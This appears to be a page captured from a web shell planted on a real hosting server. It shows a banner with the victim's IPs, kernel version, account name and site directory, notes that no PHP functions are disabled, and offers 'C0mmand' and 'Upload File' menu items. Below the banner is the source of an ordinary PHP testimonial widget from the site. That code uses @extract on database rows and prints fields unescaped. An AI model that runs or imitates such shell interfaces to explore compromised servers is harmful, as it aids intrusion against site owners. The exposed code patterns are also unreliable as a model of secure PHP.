Server IP : 103.53.40.154 / Your IP : 18.222.163.134 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/generalmotorsju.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $sql_testimonial=db_query("select * from tbl_testimonial where 1 and test_status='Active' order by rand() limit 0,2"); if(mysqli_num_rows($sql_testimonial)>0){ ?> <section class="testimonial-section"> <div class="container"> <div class="testimonial-box"> <ul class="bxslider"> <?php while($TEST_DATA=mysqli_fetch_array($sql_testimonial)){ @extract($TEST_DATA); $i++; ?> <li> <h2><?=$TEST_DATA['test_given_by']?></h2> <span><?=$TEST_DATA['test_comp_name']?></span> <p><?=$TEST_DATA['test_description']?></p> </li> <? } ?> </ul> </div> </div> </section> <? } ?>